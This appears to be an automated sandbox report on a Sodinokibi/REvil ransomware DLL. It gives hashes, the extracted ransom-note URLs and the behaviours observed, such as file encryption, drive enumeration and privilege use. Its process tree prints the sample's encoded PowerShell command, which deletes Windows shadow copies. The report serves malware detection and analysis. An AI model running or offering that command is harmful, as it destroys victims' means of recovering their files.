Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-11-2020 19:26
Static task
static1
Behavioral task
behavioral1
Sample
file.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
file.dll
Resource
win10v20201028
General
-
Target
file.dll
-
Size
166KB
-
MD5
9e9b0ef4fc739c3eb36a762122451992
-
SHA1
035fe67a3d04f0a678724851cabc917b28416fe1
-
SHA256
0ee7783213426a5e46bc11a91acf5f2d73890bb09bbf4f3b932a4b79eeb6b820
-
SHA512
01435694c0941b004584d40c3d11866e8f319445ed937095d9777911bd6f36c6bd9449b4effa369120cf6ded9de9a375719e256c6f8380bd5fbd4f4ca0c6d715
Malware Config
Extracted
C:\0vwq6-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0AC4EE68378C0111
http://decryptor.cc/0AC4EE68378C0111
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 115 IoCs
Processes:
rundll32.exeflow pid process 15 1416 rundll32.exe 20 1416 rundll32.exe 23 1416 rundll32.exe 26 1416 rundll32.exe 28 1416 rundll32.exe 30 1416 rundll32.exe 32 1416 rundll32.exe 34 1416 rundll32.exe 36 1416 rundll32.exe 38 1416 rundll32.exe 40 1416 rundll32.exe 42 1416 rundll32.exe 44 1416 rundll32.exe 46 1416 rundll32.exe 48 1416 rundll32.exe 50 1416 rundll32.exe 52 1416 rundll32.exe 54 1416 rundll32.exe 56 1416 rundll32.exe 58 1416 rundll32.exe 59 1416 rundll32.exe 60 1416 rundll32.exe 61 1416 rundll32.exe 63 1416 rundll32.exe 65 1416 rundll32.exe 67 1416 rundll32.exe 69 1416 rundll32.exe 71 1416 rundll32.exe 73 1416 rundll32.exe 75 1416 rundll32.exe 77 1416 rundll32.exe 79 1416 rundll32.exe 81 1416 rundll32.exe 83 1416 rundll32.exe 85 1416 rundll32.exe 87 1416 rundll32.exe 89 1416 rundll32.exe 91 1416 rundll32.exe 93 1416 rundll32.exe 95 1416 rundll32.exe 97 1416 rundll32.exe 99 1416 rundll32.exe 101 1416 rundll32.exe 103 1416 rundll32.exe 105 1416 rundll32.exe 107 1416 rundll32.exe 108 1416 rundll32.exe 110 1416 rundll32.exe 112 1416 rundll32.exe 114 1416 rundll32.exe 116 1416 rundll32.exe 118 1416 rundll32.exe 120 1416 rundll32.exe 121 1416 rundll32.exe 123 1416 rundll32.exe 125 1416 rundll32.exe 127 1416 rundll32.exe 128 1416 rundll32.exe 130 1416 rundll32.exe 132 1416 rundll32.exe 134 1416 rundll32.exe 136 1416 rundll32.exe 138 1416 rundll32.exe 140 1416 rundll32.exe -
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
rundll32.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\RestoreClose.tiff rundll32.exe File renamed C:\Users\Admin\Pictures\RestoreClose.tiff => \??\c:\users\admin\pictures\RestoreClose.tiff.0vwq6 rundll32.exe File renamed C:\Users\Admin\Pictures\SwitchDebug.crw => \??\c:\users\admin\pictures\SwitchDebug.crw.0vwq6 rundll32.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\D: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\P: rundll32.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bavg7orl.bmp" rundll32.exe -
Drops file in Program Files directory 31 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification \??\c:\program files\SuspendClear.xht rundll32.exe File opened for modification \??\c:\program files\UndoRemove.dot rundll32.exe File opened for modification \??\c:\program files\ExpandSelect.php rundll32.exe File opened for modification \??\c:\program files\ImportMount.xhtml rundll32.exe File opened for modification \??\c:\program files\OpenSkip.mp3 rundll32.exe File opened for modification \??\c:\program files\SubmitInstall.xla rundll32.exe File opened for modification \??\c:\program files\BackupExport.png rundll32.exe File opened for modification \??\c:\program files\ConvertToResolve.docm rundll32.exe File opened for modification \??\c:\program files\ExitSplit.iso rundll32.exe File opened for modification \??\c:\program files\InitializeCopy.ppsx rundll32.exe File opened for modification \??\c:\program files\LockRestart.m4v rundll32.exe File created \??\c:\program files\0vwq6-readme.txt rundll32.exe File opened for modification \??\c:\program files\ConvertToStop.clr rundll32.exe File opened for modification \??\c:\program files\CompleteExport.rle rundll32.exe File opened for modification \??\c:\program files\FormatSave.dwfx rundll32.exe File opened for modification \??\c:\program files\JoinLock.mpeg3 rundll32.exe File opened for modification \??\c:\program files\TestUninstall.docx rundll32.exe File opened for modification \??\c:\program files\StopImport.svgz rundll32.exe File opened for modification \??\c:\program files\SubmitBlock.DVR-MS rundll32.exe File opened for modification \??\c:\program files\TestOptimize.jfif rundll32.exe File created \??\c:\program files (x86)\0vwq6-readme.txt rundll32.exe File opened for modification \??\c:\program files\CompressSelect.sql rundll32.exe File opened for modification \??\c:\program files\StartComplete.m4a rundll32.exe File opened for modification \??\c:\program files\OutOptimize.xla rundll32.exe File opened for modification \??\c:\program files\RegisterUninstall.ex_ rundll32.exe File opened for modification \??\c:\program files\RestartTrace.jpe rundll32.exe File opened for modification \??\c:\program files\WaitRemove.mpv2 rundll32.exe File opened for modification \??\c:\program files\WaitUse.jfif rundll32.exe File opened for modification \??\c:\program files\BlockSelect.mov rundll32.exe File opened for modification \??\c:\program files\GroupDebug.nfo rundll32.exe File opened for modification \??\c:\program files\LockUnlock.dwg rundll32.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
rundll32.exepowershell.exepid process 1416 rundll32.exe 1416 rundll32.exe 3772 powershell.exe 3772 powershell.exe 3772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1416 rundll32.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeBackupPrivilege 504 vssvc.exe Token: SeRestorePrivilege 504 vssvc.exe Token: SeAuditPrivilege 504 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 980 wrote to memory of 1416 980 rundll32.exe rundll32.exe PID 980 wrote to memory of 1416 980 rundll32.exe rundll32.exe PID 980 wrote to memory of 1416 980 rundll32.exe rundll32.exe PID 1416 wrote to memory of 3772 1416 rundll32.exe powershell.exe PID 1416 wrote to memory of 3772 1416 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\file.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\file.dll,#12⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3932
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:504
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1416-0-0x0000000000000000-mapping.dmp
-
memory/3772-1-0x0000000000000000-mapping.dmp
-
memory/3772-2-0x00007FFA12FF0000-0x00007FFA139DC000-memory.dmpFilesize
9.9MB
-
memory/3772-3-0x00000156755E0000-0x00000156755E1000-memory.dmpFilesize
4KB
-
memory/3772-4-0x0000015675790000-0x0000015675791000-memory.dmpFilesize
4KB